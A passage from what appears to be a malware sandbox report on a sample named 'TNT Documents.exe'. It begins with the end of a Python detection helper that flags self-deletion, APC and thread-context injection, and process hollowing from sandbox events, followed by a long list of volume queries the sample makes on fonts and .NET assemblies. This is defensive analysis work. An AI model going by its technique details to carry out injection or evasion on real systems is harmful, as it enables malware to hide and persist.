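        if event == "Process created":
            pm = PROC_RE.match(detail)
            if not pm:
                continue
            image, cmdline = pm["image"], pm["cmdline"]
            created.setdefault(src, set()).add(image.lower())
            dm = DEL_RE.search(cmdline)
            # cmd.exe deleting the original sample file: self-deletion
            if image.lower().endswith("\\cmd.exe") and dm and dm["path"].lower() == sample_path.lower():
                findings.append(Finding("T1070.004 self-deletion via cmd.exe", src, cmdline))
        elif event == "Memory written":
            wm = WRITE_RE.match(detail)
            if wm and wm["magic"].upper().startswith("4D5A"):
                mz_writes.setdefault(src, set()).add((wm["target"].lower(), int(wm["base"], 16)))
        elif event == "Thread register set":
            ctx_set.add(src)
            findings.append(Finding("T1055.003 thread context set in foreign process", src, detail))
        elif event == "Thread APC queued":
            tm = TARGET_RE.match(detail)
            findings.append(Finding("T1055.004 APC queued in foreign process", src, tm["target"] if tm else detail))
        elif event == "Section loaded":
            sm = SECTION_RE.match(detail)
            if sm and "execute" in sm["prot"] and "write" in sm["prot"]:
                findings.append(Finding("T1055 RWX section mapped into foreign process", src, sm["target"]))
    # Hollowing needs all three: the source spawned the target, overwrote the
    # target's image with a PE (MZ at the image base) and redirected a thread.
    for src, writes in mz_writes.items():
        for target, base in writes:
            if target in created.get(src, set()) and src in ctx_set:
                findings.append(Finding("T1055.012 process hollowing", src, f"{target} @ {base:#x}"))
    return findings


def techniques(findings):
    """Distinct technique labels, in first-seen order, for a quick verdict."""
    return list(dict.fromkeys(f.technique for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES, SAMPLE_PATH):
        print(f"{f.technique:50} {f.source} -> {f.evidence}")
```

On the lines above the helper reports hollowing once, for the sample writing its own image at base 0x400000 into the child it spawned, and keeps the mstsc.exe context change as a separate thread-hijack finding because mstsc.exe never writes a PE header. A production version would key on process IDs rather than image paths, since the report resolves the context-change target only to PID 3292.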

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
